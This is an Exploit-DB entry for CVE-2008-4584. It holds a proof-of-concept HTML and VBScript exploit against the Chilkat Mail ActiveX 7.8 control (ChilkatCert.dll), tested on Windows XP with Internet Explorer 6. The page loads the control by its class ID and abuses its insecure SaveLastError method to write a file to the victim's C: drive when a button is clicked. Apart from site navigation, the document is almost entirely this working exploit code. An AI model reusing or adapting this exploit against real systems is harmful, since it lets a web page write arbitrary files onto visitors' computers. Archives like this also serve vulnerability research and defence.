Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method

EDB-ID:

5005

CVE:

2008-4584

EDB Verified:

Author:

darkl0rd

Type:

remote

Exploit: /

Platform:

Windows

Date:

2008-01-29

Vulnerable App:

<body bgcolor="#000000">

<p align="center"><b><font face="Verdana" color="#00FF00" size="2">Chilkat Mail 
ActiveX 7.8 (ChilkatCert.dll) Insecure Method Exploit</font></b></p>
<p align="center"><b><font face="Verdana" size="2" color="#00FF00">Site :
<a href="http://www.chilkatsoft.com"><font color="#00FF00">www.chilkatsoft.com</font></a></font></b></p>
<p align="center"><font color="#00FF00" face="Verdana">
===================================================</font></p>
<p align="center"><b><font face="Verdana" color="#00FF00" size="2">Tested on 
Windows XP Professional SP2 , with Internet Explorer 6</font></b></p>
<p align="center"><b><font face="Verdana" size="2" color="#00FF00">Author : 
darkl0rd</font></b></p>
<p align="center"><b><font face="Verdana" size="2" color="#00FF00">E-Mail : 
l_l_darkl0rd_l_l[at]yahoo[dot]com</font></b></p>
<p align="center"><b><font color="#FF0000" face="Verdana" size="2">SaveLastError</font></b></p>
<p align="center">
<object classid='clsid:2A9A3D40-2F32-45BF-9A89-AC9ED6C2FEDF' id='over' align="left"></object>

<input language=VBScript onclick=lose() type=button value="Exploit">

<script language='vbscript'>
 Sub lose
   mystr="c:\darkl0rd.txt"
   over.SaveLastError mystr
   MyMsg = MsgBox("Done !")
 End Sub
</script>
</span></span>

</code></p>
</pre>

# milw0rm.com [2008-01-29]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services